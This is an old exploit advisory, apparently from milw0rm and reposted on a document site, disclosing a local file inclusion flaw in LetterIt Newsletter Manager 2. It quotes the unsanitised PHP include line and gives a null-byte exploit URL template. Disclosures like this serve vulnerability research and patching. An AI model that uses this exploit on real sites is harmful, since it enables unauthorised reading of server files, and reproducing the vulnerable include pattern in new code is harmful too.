LetterIt 2 language Local File Inclusion Vulnerability

Document Sample
LetterIt 2 language Local File Inclusion Vulnerability Powered By Docstoc
					                                LetterIt 2 language Local File Inclusion Vulnerability   Page 1/1
  1    ====================================================================
  2
  3
  4      [o] LetterIt 2 Local File Inclusion Vulnerability
  5
  6           Software   :   LetterIt Newsletter Manager version 2
  7           Vendor     :   http://www.letterit.de/
  8           Author     :   NoGe
  9           Contact    :   noge[dot]code[at]gmail[dot]com
  10
  11
  12   ====================================================================
  13
  14
  15     [o] Vulnerable file
  16
  17          inc/wysiwyg.php
  18
  19           include("../language/".$_GET[’language’].".php");
  20
  21
  22
  23     [o] Exploit
  24
  25          http://localhost/[path]/inc/wysiwyg.php?language=[LFI]%00
  26
  27
  28   ====================================================================
  29
  30
  31     [o] Greetz
  32
  33          supported by irc.nob0dy.net
  34          MainHack BrotherHood [ www.mainhack.com ]
  35          VOP Crew [ Vaksin13 OoN_BoY Paman ]
  36          H312Y yooogy mousekill }^−^{ martfella
  37          skulmatic olibekas ulga Cungkee nyubi k1tk4t str0ke
  38
  39
  40   ====================================================================
  41
  42   # milw0rm.com [2008−07−31]




NoGe                                                                                     07/31/2008

				
DOCUMENT INFO